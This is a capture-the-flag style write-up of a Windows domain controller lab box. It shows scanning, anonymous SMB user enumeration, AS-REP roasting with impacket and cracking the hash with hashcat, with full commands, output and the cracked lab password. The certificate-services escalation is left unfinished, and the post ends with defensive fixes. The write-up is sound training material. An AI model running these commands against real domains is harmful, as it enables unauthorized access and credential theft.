Box: Active Directory (Hack Smarter / OSCP-style) · OS: Windows Server 2022 · Domain: shadow.gate · Theme: Null-session enum → AS-REP roasting → AD CS

ShadowGate is a proper Active Directory box — no web app, just a domain controller and the classic AD kill chain. I got a foothold the way you so often do against a misconfigured DC: an anonymous SMB session gave me the user list, one of those users was AS-REP roastable, and their password fell to rockyou in seconds. From there the trail points straight at Active Directory Certificate Services.

Recon

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShadowGate]
└─$ rustscan -a 10.0.21.211 -- -A
Open 10.0.21.211:53
Open 10.0.21.211:80
Open 10.0.21.211:88
Open 10.0.21.211:135
Open 10.0.21.211:139
Open 10.0.21.211:389
Open 10.0.21.211:445
Open 10.0.21.211:464
Open 10.0.21.211:593
Open 10.0.21.211:636
Open 10.0.21.211:3268
Open 10.0.21.211:3269
Open 10.0.21.211:3389
Open 10.0.21.211:5985
Open 10.0.21.211:9389

Trimming nmap to the essentials:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: shadow.gate)
| ssl-cert: Subject: commonName=DC01.shadow.gate
| Issuer: commonName=shadow-DC01-CA/domainComponent=shadow
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0   # WinRM
9389/tcp open  adws?

The port spread screamed domain controller, and the LDAP certificate handed me the naming: domain shadow.gate, DC DC01.shadow.gate, plus a CA named shadow-DC01-CA already visible in the issuer field. First move — add both to /etc/hosts.

SMB Enumeration — anonymous access

Signing was off, so I tried a null session and it worked:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShadowGate]
└─$ nxc smb 10.0.21.211 -u "" -p ""
SMB   10.0.21.211  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:shadow.gate) (signing:False) (SMBv1:None)
SMB   10.0.21.211  445  DC01  [+] shadow.gate\:

That blank session was enough to pull the full domain user list:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShadowGate]
└─$ nxc smb 10.0.21.211 -u "" -p "" --users
SMB   10.0.21.211  445  DC01  -Username-      -Last PW Set-        -BadPW-  -Description-
SMB   10.0.21.211  445  DC01  Administrator   2026-01-11 11:33:05  0        Built-in account for administering the computer/domain
SMB   10.0.21.211  445  DC01  Guest           <never>              0        Built-in account for guest access
SMB   10.0.21.211  445  DC01  krbtgt          2026-01-12 02:45:27  0        Key Distribution Center Service Account
SMB   10.0.21.211  445  DC01  ATHENA          2026-03-04 15:23:19  0
SMB   10.0.21.211  445  DC01  mbrownlee       2026-03-04 15:24:05  0
SMB   10.0.21.211  445  DC01  bbrown          2026-01-15 14:24:07  0
SMB   10.0.21.211  445  DC01  jtrueblood      2026-04-28 18:14:47  0
SMB   10.0.21.211  445  DC01  jsmith          2026-03-04 15:26:29  0
SMB   10.0.21.211  445  DC01  clocke          2026-03-04 15:24:32  0
SMB   10.0.21.211  445  DC01  tclarke         2026-03-04 15:25:33  0
SMB   10.0.21.211  445  DC01  jbradford       2026-03-04 15:24:59  0
SMB   10.0.21.211  445  DC01  amoss           2026-03-04 15:25:52  0
SMB   10.0.21.211  445  DC01  [*] Enumerated 12 local users: SHADOW

I dropped those names into users.txt.

AS-REP Roasting

With a user list and no credentials, AS-REP roasting is the obvious next play — it targets accounts that don’t require Kerberos pre-authentication:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShadowGate]
└─$ impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip DC01.shadow.gate 'shadow.gate/'
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ATHENA doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mbrownlee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bbrown doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jtrueblood@SHADOW.GATE:8931dd65...a2158a2cd5a7...9e3ac6
[-] User jsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User clocke doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tclarke doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jbradford doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User amoss doesn't have UF_DONT_REQUIRE_PREAUTH set

Only one account had pre-auth disabled — jtrueblood — and it returned a $krb5asrep$ hash. Straight into hashcat with mode 18200:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShadowGate]
└─$ hashcat -a 0 -m 18200 ASREProastables.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$jtrueblood@SHADOW.GATE:8931dd65...9e3ac6:blood_brothers
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)

Initial access: jtrueblood : blood_brothers.

Foothold — authenticated enumeration

Valid domain creds in hand, I checked share access:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShadowGate]
└─$ nxc smb 10.0.21.211 -u "jtrueblood" -p "blood_brothers" --shares
SMB   10.0.21.211  445  DC01  [+] shadow.gate\jtrueblood:blood_brothers
SMB   10.0.21.211  445  DC01  Share        Permissions  Remark
SMB   10.0.21.211  445  DC01  -----        -----------  ------
SMB   10.0.21.211  445  DC01  ADMIN$                    Remote Admin
SMB   10.0.21.211  445  DC01  C$                        Default share
SMB   10.0.21.211  445  DC01  CertEnroll   READ         Active Directory Certificate Services share
SMB   10.0.21.211  445  DC01  IPC$         READ         Remote IPC
SMB   10.0.21.211  445  DC01  NETLOGON     READ         Logon server share
SMB   10.0.21.211  445  DC01  SYSVOL       READ         Logon server share

CertEnroll stood out — the Active Directory Certificate Services share, a strong signal AD CS is in play. I pulled everything from it:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShadowGate]
└─$ smbclient //10.0.21.211/CertEnroll -U "jtrueblood"
smb: \> mget *
getting file \DC01.shadow.gate_shadow-DC01-CA.crt of size 877 ...
getting file \nsrev_shadow-DC01-CA.asp of size 323 ...
getting file \shadow-DC01-CA+.crl of size 725 ...
getting file \shadow-DC01-CA.crl of size 914 ...

The CA (shadow-DC01-CA) is confirmed on the box.

Privilege Escalation — AD CS

(This run’s notes stop at the CertEnroll loot.) With a valid domain user and a live enterprise CA, the natural next step is to enumerate the certificate templates for an ESC misconfiguration — running certipy find as jtrueblood to look for a vulnerable template, then abusing it to escalate toward Domain Admin. I’ll complete this section once I’ve captured the certificate-abuse path.

Takeaways

  • Anonymous SMB is a gift. A null session that leaks the full user list turns “no creds” into “a target list for roasting.”
  • AS-REP roasting needs nothing but a username. Any account with pre-auth disabled is crackable offline — and weak passwords like blood_brothers don’t survive rockyou.
  • CertEnroll = AD CS = look for ESC. An exposed enterprise CA is one of the most reliable escalation paths in modern AD.
  • Defensive fixes: disable anonymous SMB and enable signing, require Kerberos pre-auth on every account, enforce strong passwords, and audit certificate templates for insecure enrollment settings.